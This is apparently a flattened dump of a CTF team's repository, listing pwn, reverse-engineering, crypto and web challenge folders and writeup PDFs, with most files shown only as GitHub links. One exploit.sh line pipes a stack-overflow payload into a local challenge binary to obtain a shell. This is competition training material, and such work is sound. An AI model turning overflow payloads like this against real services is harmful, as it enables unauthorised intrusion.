├── Arka-vidia-5 └── Pwn │ ├── echo │ ├── echo │ └── echo.py │ └── shellcode │ ├── flag │ ├── sh.py │ └── shellcode ├── BsidesDelhi-2018 ├── pwn │ └── data_bank │ │ ├── README.md │ │ ├── data_bank │ │ ├── exploit.py │ │ └── libc.so.6 └── rev │ ├── avap │ ├── avap │ └── avap_solver.py │ └── static │ ├── README.md │ ├── rev │ ├── rev.i64 │ └── static_solver.py ├── CJ2020_ROP Revenge.pdf ├── CJ_R.O.P.pdf ├── PWN-2018 ├── crypto │ └── converter │ │ ├── README.md │ │ ├── decrypt.py │ │ └── encrypt.py ├── misc │ ├── Very-Secure-FTP │ │ └── README.md │ └── math_riddle │ │ ├── README.md │ │ └── checker.py ├── pwn │ ├── babypwn │ │ ├── babypwn │ │ ├── exploit.py │ │ └── libc.so.6 │ ├── echo_chamber │ │ ├── README.md │ │ ├── echo_chamber │ │ ├── exploit.py │ │ ├── ld-linux.so.2 │ │ └── libc.so.6 │ ├── exploitation_class │ │ ├── exploit.py │ │ ├── exploitClass │ │ └── libc.so.6 │ ├── importantservice │ │ ├── exploit.sh │ │ └── importantservice │ ├── kindergarten │ │ ├── exploit.py │ │ ├── kindergarten │ │ └── libc-2.23.so │ └── slottiermachine │ │ ├── README.md │ │ ├── exploit.py │ │ ├── ld-2.28.so │ │ ├── libc-2.28.so │ │ └── slottiermachine └── web │ ├── Hipster Startup │ └── README.md │ └── SVG2PNG │ ├── README.md │ ├── flag.png │ ├── solver.svg │ └── source.py ├── R.O.P_CJ2019.pdf ├── README.md ├── Rev.ID_CTF_COMPFEST_11_QUALS.pdf ├── Rev.ID_CTF_Quals_ISCC_2019.pdf ├── RevID.CTF_Compfest_X_Quals.pdf ├── RevID.CTF_JHack_2018_Final_CTF.pdf ├── RevID.CTF_SlashRootCTF_2018.pdf ├── RevIDCTF_IFESTCTF 2018.pdf ├── RevID_CTF_DISINFOLAHTAD.pdf ├── RevID_CTF_JHack_2018_Quals.pdf └── Rules Of Pwning_CyberJawara_2018.pdf /Arka-vidia-5/Pwn/echo/echo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/Arka-vidia-5/Pwn/echo/echo -------------------------------------------------------------------------------- /Arka-vidia-5/Pwn/echo/echo.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/Arka-vidia-5/Pwn/echo/echo.py -------------------------------------------------------------------------------- /Arka-vidia-5/Pwn/shellcode/flag: -------------------------------------------------------------------------------- 1 | ini_flag_local 2 | -------------------------------------------------------------------------------- /Arka-vidia-5/Pwn/shellcode/sh.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/Arka-vidia-5/Pwn/shellcode/sh.py -------------------------------------------------------------------------------- /Arka-vidia-5/Pwn/shellcode/shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/Arka-vidia-5/Pwn/shellcode/shellcode -------------------------------------------------------------------------------- /BsidesDelhi-2018/pwn/data_bank/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/BsidesDelhi-2018/pwn/data_bank/README.md -------------------------------------------------------------------------------- /BsidesDelhi-2018/pwn/data_bank/data_bank: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/BsidesDelhi-2018/pwn/data_bank/data_bank -------------------------------------------------------------------------------- /BsidesDelhi-2018/pwn/data_bank/exploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/BsidesDelhi-2018/pwn/data_bank/exploit.py -------------------------------------------------------------------------------- /BsidesDelhi-2018/pwn/data_bank/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/BsidesDelhi-2018/pwn/data_bank/libc.so.6 -------------------------------------------------------------------------------- /BsidesDelhi-2018/rev/avap/avap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/BsidesDelhi-2018/rev/avap/avap -------------------------------------------------------------------------------- /BsidesDelhi-2018/rev/avap/avap_solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/BsidesDelhi-2018/rev/avap/avap_solver.py -------------------------------------------------------------------------------- /BsidesDelhi-2018/rev/static/README.md: -------------------------------------------------------------------------------- 1 | # static 2 | Writeup : Soon 3 | -------------------------------------------------------------------------------- /BsidesDelhi-2018/rev/static/rev: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/BsidesDelhi-2018/rev/static/rev -------------------------------------------------------------------------------- /BsidesDelhi-2018/rev/static/rev.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/BsidesDelhi-2018/rev/static/rev.i64 -------------------------------------------------------------------------------- /BsidesDelhi-2018/rev/static/static_solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/BsidesDelhi-2018/rev/static/static_solver.py -------------------------------------------------------------------------------- /CJ2020_ROP Revenge.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/CJ2020_ROP Revenge.pdf -------------------------------------------------------------------------------- /CJ_R.O.P.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/CJ_R.O.P.pdf -------------------------------------------------------------------------------- /PWN-2018/crypto/converter/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/crypto/converter/README.md -------------------------------------------------------------------------------- /PWN-2018/crypto/converter/decrypt.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/crypto/converter/decrypt.py -------------------------------------------------------------------------------- /PWN-2018/crypto/converter/encrypt.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/crypto/converter/encrypt.py -------------------------------------------------------------------------------- /PWN-2018/misc/Very-Secure-FTP/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/misc/Very-Secure-FTP/README.md -------------------------------------------------------------------------------- /PWN-2018/misc/math_riddle/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/misc/math_riddle/README.md -------------------------------------------------------------------------------- /PWN-2018/misc/math_riddle/checker.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/misc/math_riddle/checker.py -------------------------------------------------------------------------------- /PWN-2018/pwn/babypwn/babypwn: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/babypwn/babypwn -------------------------------------------------------------------------------- /PWN-2018/pwn/babypwn/exploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/babypwn/exploit.py -------------------------------------------------------------------------------- /PWN-2018/pwn/babypwn/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/babypwn/libc.so.6 -------------------------------------------------------------------------------- /PWN-2018/pwn/echo_chamber/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/echo_chamber/README.md -------------------------------------------------------------------------------- /PWN-2018/pwn/echo_chamber/echo_chamber: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/echo_chamber/echo_chamber -------------------------------------------------------------------------------- /PWN-2018/pwn/echo_chamber/exploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/echo_chamber/exploit.py -------------------------------------------------------------------------------- /PWN-2018/pwn/echo_chamber/ld-linux.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/echo_chamber/ld-linux.so.2 -------------------------------------------------------------------------------- /PWN-2018/pwn/echo_chamber/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/echo_chamber/libc.so.6 -------------------------------------------------------------------------------- /PWN-2018/pwn/exploitation_class/exploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/exploitation_class/exploit.py -------------------------------------------------------------------------------- /PWN-2018/pwn/exploitation_class/exploitClass: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/exploitation_class/exploitClass -------------------------------------------------------------------------------- /PWN-2018/pwn/exploitation_class/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/exploitation_class/libc.so.6 -------------------------------------------------------------------------------- /PWN-2018/pwn/importantservice/exploit.sh: -------------------------------------------------------------------------------- 1 | (python -c 'print "1025 0\n"+"A"*0x400 + "\xa9"'; cat -) | ./importantservice 2 | -------------------------------------------------------------------------------- /PWN-2018/pwn/importantservice/importantservice: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/importantservice/importantservice -------------------------------------------------------------------------------- /PWN-2018/pwn/kindergarten/exploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/kindergarten/exploit.py -------------------------------------------------------------------------------- /PWN-2018/pwn/kindergarten/kindergarten: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/kindergarten/kindergarten -------------------------------------------------------------------------------- /PWN-2018/pwn/kindergarten/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/kindergarten/libc-2.23.so -------------------------------------------------------------------------------- /PWN-2018/pwn/slottiermachine/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/slottiermachine/README.md -------------------------------------------------------------------------------- /PWN-2018/pwn/slottiermachine/exploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/slottiermachine/exploit.py -------------------------------------------------------------------------------- /PWN-2018/pwn/slottiermachine/ld-2.28.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/slottiermachine/ld-2.28.so -------------------------------------------------------------------------------- /PWN-2018/pwn/slottiermachine/libc-2.28.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/slottiermachine/libc-2.28.so -------------------------------------------------------------------------------- /PWN-2018/pwn/slottiermachine/slottiermachine: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/pwn/slottiermachine/slottiermachine -------------------------------------------------------------------------------- /PWN-2018/web/Hipster Startup/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/web/Hipster Startup/README.md -------------------------------------------------------------------------------- /PWN-2018/web/SVG2PNG/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/web/SVG2PNG/README.md -------------------------------------------------------------------------------- /PWN-2018/web/SVG2PNG/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/web/SVG2PNG/flag.png -------------------------------------------------------------------------------- /PWN-2018/web/SVG2PNG/solver.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/web/SVG2PNG/solver.svg -------------------------------------------------------------------------------- /PWN-2018/web/SVG2PNG/source.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/PWN-2018/web/SVG2PNG/source.py -------------------------------------------------------------------------------- /R.O.P_CJ2019.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/R.O.P_CJ2019.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/README.md -------------------------------------------------------------------------------- /Rev.ID_CTF_COMPFEST_11_QUALS.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/Rev.ID_CTF_COMPFEST_11_QUALS.pdf -------------------------------------------------------------------------------- /Rev.ID_CTF_Quals_ISCC_2019.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/Rev.ID_CTF_Quals_ISCC_2019.pdf -------------------------------------------------------------------------------- /RevID.CTF_Compfest_X_Quals.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/RevID.CTF_Compfest_X_Quals.pdf -------------------------------------------------------------------------------- /RevID.CTF_JHack_2018_Final_CTF.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/RevID.CTF_JHack_2018_Final_CTF.pdf -------------------------------------------------------------------------------- /RevID.CTF_SlashRootCTF_2018.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/RevID.CTF_SlashRootCTF_2018.pdf -------------------------------------------------------------------------------- /RevIDCTF_IFESTCTF 2018.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/RevIDCTF_IFESTCTF 2018.pdf -------------------------------------------------------------------------------- /RevID_CTF_DISINFOLAHTAD.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/RevID_CTF_DISINFOLAHTAD.pdf -------------------------------------------------------------------------------- /RevID_CTF_JHack_2018_Quals.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/RevID_CTF_JHack_2018_Quals.pdf -------------------------------------------------------------------------------- /Rules Of Pwning_CyberJawara_2018.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RevID-CTF/CTF/HEAD/Rules Of Pwning_CyberJawara_2018.pdf --------------------------------------------------------------------------------